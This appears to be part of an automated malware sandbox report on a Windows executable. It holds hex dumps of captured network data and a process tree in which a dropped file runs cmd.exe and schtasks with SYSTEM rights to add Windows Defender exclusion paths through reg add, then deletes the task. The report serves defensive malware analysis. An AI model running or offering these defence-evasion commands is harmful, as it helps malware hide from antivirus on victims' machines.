95 2c 2c 4f 8b 14 7f 7f f4
                                                  Data Ascii: {lc~qpRjK,d=$bMQWV![S/[@IH1SMA@J=O)M2Y1.#"hn*{75|?flLOIVw)`]b* hy#Mp#gcaO3#?@3`qL6M8PGVY[\f[#!bg.,.",,O
                                                  2025-01-07 09:00:05 UTC4096INData Raw: 82 84 85 0f ca 78 02 84 c2 05 c0 72 79 51 90 9d 16 47 97 96 97 cb 14 86 aa 17 8e 17 ca 54 2a f4 5f 2d f0 5e 2c fd 5d 23 f6 a0 5b 6c ae c5 c5 73 49 b0 ff 35 4d 87 cf b9 d1 83 e7 35 f4 c4 fa 89 cb b1 87 7d c7 c8 c9 4a 48 36 ed bd d6 5b 1b 01 38 59 99 d4 d3 2f 0a fb 87 64 99 20 d6 95 c2 69 ae ec c4 ff 0c f4 64 a0 0b 3f 06 63 a3 f2 f5 05 20 d5 69 4e 33 f8 f9 fa 05 f5 88 f8 74 4d 09 23 5a 00 8e 5b 0b 83 5a 02 80 57 09 85 42 ec 12 5f e7 9d 4f 12 9c 4d 15 91 41 18 96 4c 17 a9 72 2a aa 69 d9 ad f6 e9 d3 2e 61 af d7 11 59 33 5b 0d 69 bf 68 ce b4 db 38 b3 66 c8 32 bb b0 40 41 42 68 31 bd cd 1a b0 88 b1 4f 26 72 c7 3a 5c 1a 0c 68 8a 23 54 dc 86 5a 17 a3 d7 8c 9f a5 64 2b eb 2e 98 5e b0 11 6a e2 bc 50 b6 19 30 e4 3d 7d f9 02 70 4e 07 7f 0d 42 c4 7b 7c 7d fe fc 7b a1
                                                  Data Ascii: xryQGT*_-^,]#[lsI5M5}JH6[8Y/d id?c iN3tM#Z[ZWB_OMALr*i.aY3[ih8f2@ABh1O&r:\h#TZd+.^jP0=}pNB{|}{
                                                  2025-01-07 09:00:05 UTC4096INData Raw: 96 50 05 c6 87 03 51 b1 54 f9 c1 b7 b2 40 27 d2 93 e0 a6 c0 7f 0c 42 65 64 c5 18 5e 90 25 d3 5d 5c 5b 2e e3 b7 93 6e a5 2f fc 52 51 50 77 b1 be b3 b4 b5 5f f2 47 46 45 88 43 36 cb b3 aa c5 2a 87 17 3a 39 9e 0b f2 15 be c1 46 8b df eb 16 a6 d5 13 d5 da d7 d8 d9 51 18 34 28 11 20 1f 22 88 f3 8c ad 70 a7 e8 01 49 24 13 12 65 b2 f8 74 29 86 fa 0a 83 fb 10 04 07 04 03 a4 17 33 01 01 02 88 71 09 83 f1 7d 05 59 e3 2f d2 f1 f0 49 f8 a5 12 14 15 95 2a a0 ae 5a 1b 1f 12 9b 8c 21 21 22 10 db ac 5b c3 ab d7 ca 24 ab a7 2f 2f 30 5b 36 db 99 e6 c9 c8 61 b0 47 c7 6f d5 d9 d1 bf be 1b ca 01 a5 7d 80 47 cd d4 4b 4c 4d 75 7a f0 e6 12 53 23 1c 00 04 08 b1 93 a8 a3 a2 dd 9b 6c e4 a2 17 61 ec 3b 83 83 5c 3c 83 f4 9b 91 90 29 f8 37 97 4f b2 02 50 f3 3a 86 33 47 bb 0c 7d 0b 47
                                                  Data Ascii: PQT@'Bed^%]\[.n/RQPw_GFEC6*:9FQ4( "pI$et)3q}Y/I*Z!!"[$//0[6aGo}GKLMuzS#la;\<)7OP:3G}G
                                                  2025-01-07 09:00:05 UTC4096INData Raw: 8e 79 76 23 7b 77 ad 1f fb eb cd 8e 04 6f 66 4b 6c b0 18 b6 f0 d8 99 17 d2 9c 16 59 25 a3 a1 a2 a3 27 5c a2 d5 a4 2a 4a a8 87 65 51 8b 35 c5 d4 f3 b4 4a 92 3a c8 de fa bb 2c 39 d8 ff c0 69 a4 83 c4 15 a0 87 c8 43 8c c8 ef 1c 46 88 d3 52 3c d2 15 3c d4 54 37 d8 59 22 d4 af 6c 22 13 44 1e 1c c0 70 96 80 a8 e9 67 a2 ec 67 a8 ec d3 20 7a b4 f7 7f b0 f5 39 10 f8 73 bb ff 7d 11 02 82 ed 01 87 fc 0e 75 80 f4 f9 ae f0 f2 2a 9a 60 76 52 13 84 9f 50 14 3b c8 92 5c 1f 97 58 1d a8 66 20 a9 62 24 e7 ce 2a a1 6d 2a af c3 2d ac df 32 b1 ca 3c 3a b4 61 c7 c6 c5 c6 cf 98 c2 c0 64 d4 32 24 04 45 cb 0e 48 6d 2d 0b 4c 61 29 0f 50 65 35 13 54 69 31 17 58 1d 3d 1b 5c 11 39 1f 60 35 05 23 64 02 01 27 68 e2 2e e5 70 e4 2a e0 6c fa 36 fd 6c fc 32 f8 60 f2 3e f5 68 f4 3a f0 94 0a
                                                  Data Ascii: yv#{wofKlY%'\*JeQ5J:,9iCFR<<T7Y"l"Dpgg z9s}u*`vRP;\Xf b$*m*-2<:ad2$EHm-La)Pe5Ti1X=\9`5#d'h.p*l6l2`>h:
                                                  2025-01-07 09:00:05 UTC4096INData Raw: ed e5 e7 ea e2 a8 fd e5 ab e5 e3 e7 fb f9 f0 fe fa ee f0 b6 ff fd f8 ea 96 96 9d 9e 9f a0 f3 94 93 96 92 ab ad 85 89 c4 c4 d8 8d cb c1 df c4 d5 db 94 c6 c6 d6 db dc 9a dd d3 cf 9e d3 af b6 ab ac e4 ac a8 ae bc a0 ab a7 a5 b7 af bb b9 be bc de de d5 d6 d7 d8 8b ec eb ee eb d3 d5 cd c1 8c 8c 90 c5 83 89 87 9c 8d 83 cc 9e 9e 8e 93 94 d2 95 9b 87 d6 84 8c 9d 93 94 dc 94 90 96 74 68 63 6f 6d 7f 67 73 61 66 64 06 06 0d 0e 0f 10 43 24 23 26 20 1b 1d 35 39 6a 6e 6e 78 3e 69 49 53 56 56 45 49 06 41 5d 47 49 5f 45 42 40 0f 53 50 5e 5f 39 3f 36 37 38 6b 0c 0b 0e 09 33 35 6d 61 2c 2c 30 65 23 29 27 3c 2d 23 6c 3e 3e 2e 33 34 72 35 3b 27 76 08 37 37 3f 23 35 29 71 3e 14 04 1a 0a 10 45 12 06 0a 05 0f 66 66 6d 6e 6f 70 23 44 43 45 4c 7b 7d 55 59 0f 15 1d 1f 12 1a a0 f5
                                                  Data Ascii: thcomgsafdC$#& 59jnnx>iISVVEIA]GI_EB@SP^_9?678k35ma,,0e#)'<-#l>>.34r5;'v77?#5)q>Effmnop#DCEL{}UY
                                                  2025-01-07 09:00:05 UTC4096INData Raw: 83 84 09 79 78 77 89 8a 8b 8c 73 71 70 6f 8a b2 d3 94 8a b6 d7 98 99 9a 9b 9c 63 61 60 5f a1 a2 a3 a4 71 59 58 57 a9 aa ab ac 53 51 50 4f b1 b2 b3 b4 01 94 f7 b8 47 45 44 43 bd be bf c0 02 e0 83 c4 3b 39 38 37 c9 ca cb cc 15 31 30 2f d1 d2 d3 d4 2b 29 28 27 d9 da db dc ab fa 9f e0 1f 1d 1c 1b e5 e6 e7 e8 6b ce ab ec 13 11 10 0f f1 f2 f3 f4 2d 09 08 07 f9 fa fb fc 03 01 00 ff fb 2a 43 04 fb 2e 47 08 09 0a 0b 0c f3 f1 f0 ef 11 12 13 14 c1 e9 e8 e7 19 1a 1b 1c e3 e1 e0 df 21 22 23 24 b2 0c 67 28 29 2a 2b 2c d3 d1 d0 cf 31 32 33 34 e1 c9 c8 c7 39 3a 3b 3c c3 c1 c0 bf 41 42 43 44 e3 6b 07 48 49 4a 4b 4c b3 b1 b0 af 51 52 53 54 8d a9 a8 a7 59 5a 5b 5c a3 a1 a0 9f 6a 4d 23 64 7a 49 27 68 69 6a 6b 6c 93 91 90 8f 71 72 73 74 b5 89 88 87 79 7a 7b 7c 83 81 80 7f 81
                                                  Data Ascii: yxwsqpoca`_qYXWSQPOGEDC;98710/+)('k-*C.G!"#$g()*+,12349:;<ABCDkHIJKLQRSTYZ[\jM#dzI'hijklqrstyz{|
                                                  2025-01-07 09:00:05 UTC4096INData Raw: ea ee ee ea ea e6 e6 fa fa fe fe fa fa e6 e6 ea ea ee 95 96 97 98 99 9a da de de da da e6 e6 ea ea ee ee ea ea e6 e6 fa fa fe fe fa fa e6 e6 ea ea ee b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 5b 5c 5d 5e 5f 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 6f 90 91
                                                  Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~o


                                                  Click to jump to process

                                                  Click to jump to process

                                                  Click to dive into process behavior distribution

                                                  Click to jump to process

                                                  Target ID:0
                                                  Start time:03:58:00
                                                  Start date:07/01/2025
                                                  Path:C:\Users\user\Desktop\23567791246-764698008.02.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\Desktop\23567791246-764698008.02.exe"
                                                  Imagebase:0x140000000
                                                  File size:30'976'000 bytes
                                                  MD5 hash:8A4C55E9DB32EA50154FFAEC17EA2FF7
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:4
                                                  Start time:03:59:42
                                                  Start date:07/01/2025
                                                  Path:C:\Users\user\Documents\lSQb8c.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Users\user\Documents\lSQb8c.exe
                                                  Imagebase:0x140000000
                                                  File size:133'136 bytes
                                                  MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Antivirus matches:
                                                  • Detection: 0%, ReversingLabs
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:5
                                                  Start time:03:59:44
                                                  Start date:07/01/2025
                                                  Path:C:\Users\user\Documents\lSQb8c.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Users\user\Documents\lSQb8c.exe
                                                  Imagebase:0x140000000
                                                  File size:133'136 bytes
                                                  MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:false

                                                  Target ID:6
                                                  Start time:03:59:55
                                                  Start date:07/01/2025
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                  Imagebase:0x7ff7e1960000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:7
                                                  Start time:03:59:55
                                                  Start date:07/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:8
                                                  Start time:03:59:55
                                                  Start date:07/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
                                                  Imagebase:0x7ff6d9a10000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:9
                                                  Start time:03:59:56
                                                  Start date:07/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:SCHTASKS /Run /TN "Task1"
                                                  Imagebase:0x7ff6d9a10000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:10
                                                  Start time:03:59:56
                                                  Start date:07/01/2025
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                                  Imagebase:0x7ff7e1960000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:11
                                                  Start time:03:59:56
                                                  Start date:07/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:SCHTASKS /Delete /TN "Task1" /F
                                                  Imagebase:0x7ff6d9a10000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:12
                                                  Start time:03:59:56
                                                  Start date:07/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:13
                                                  Start time:03:59:56
                                                  Start date:07/01/2025
                                                  Path:C:\Windows\System32\reg.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                                  Imagebase:0x7ff7bf0a0000
                                                  File size:77'312 bytes
                                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:14
                                                  Start time:03:59:56
                                                  Start date:07/01/2025
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                  Imagebase:0x7ff7e1960000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:15
                                                  Start time:03:59:56
                                                  Start date:07/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:16
                                                  Start time:03:59:56
                                                  Start date:07/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                                                  Imagebase:0x7ff6d9a10000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:17
                                                  Start time:03:59:56
                                                  Start date:07/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:SCHTASKS /Run /TN "Task1"
                                                  Imagebase:0x7ff6d9a10000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:18
                                                  Start time:03:59:57
                                                  Start date:07/01/2025
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                                  Imagebase:0x7ff7e1960000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:19
                                                  Start time:03:59:57
                                                  Start date:07/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:SCHTASKS /Delete /TN "Task1" /F
                                                  Imagebase:0x7ff6d9a10000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:20
                                                  Start time:03:59:57
                                                  Start date:07/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:21
                                                  Start time:03:59:57
                                                  Start date:07/01/2025
                                                  Path:C:\Windows\System32\reg.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                                  Imagebase:0x7ff7bf0a0000
                                                  File size:77'312 bytes
                                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:22
                                                  Start time:03:59:57
                                                  Start date:07/01/2025
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                  Imagebase:0x7ff7e1960000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:23
                                                  Start time:03:59:57
                                                  Start date:07/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:24
                                                  Start time:03:59:57
                                                  Start date:07/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                                                  Imagebase:0x7ff6d9a10000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:25
                                                  Start time:03:59:58
                                                  Start date:07/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:SCHTASKS /Run /TN "Task1"
                                                  Imagebase:0x7ff6d9a10000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:26
                                                  Start time:03:59:58
                                                  Start date:07/01/2025
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                                  Imagebase:0x7ff7e1960000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:27
                                                  Start time:03:59:58
                                                  Start date:07/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:28
                                                  Start time:03:59:58
                                                  Start date:07/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:SCHTASKS /Delete /TN "Task1" /F
                                                  Imagebase:0x7ff6d9a10000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:29
                                                  Start time:03:59:58
                                                  Start date:07/01/2025
                                                  Path:C:\Windows\System32\reg.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                                  Imagebase:0x7ff7bf0a0000
                                                  File size:77'312 bytes
                                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:30
                                                  Start time:03:59:59
                                                  Start date:07/01/2025
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                  Imagebase:0x7ff7e1960000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:31
                                                  Start time:03:59:59
                                                  Start date:07/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:32
                                                  Start time:03:59:59
                                                  Start date:07/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
                                                  Imagebase:0x7ff6d9a10000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:33
                                                  Start time:03:59:59
                                                  Start date:07/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:SCHTASKS /Run /TN "Task1"
                                                  Imagebase:0x7ff6d9a10000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:34
                                                  Start time:03:59:59
                                                  Start date:07/01/2025
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
                                                  Imagebase:0x7ff7e1960000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:35
                                                  Start time:03:59:59
                                                  Start date:07/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:36
                                                  Start time:03:59:59
                                                  Start date:07/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:SCHTASKS /Delete /TN "Task1" /F
                                                  Imagebase:0x7ff6d9a10000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:37
                                                  Start time:03:59:59
                                                  Start date:07/01/2025
                                                  Path:C:\Windows\System32\reg.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
                                                  Imagebase:0x7ff7bf0a0000
                                                  File size:77'312 bytes
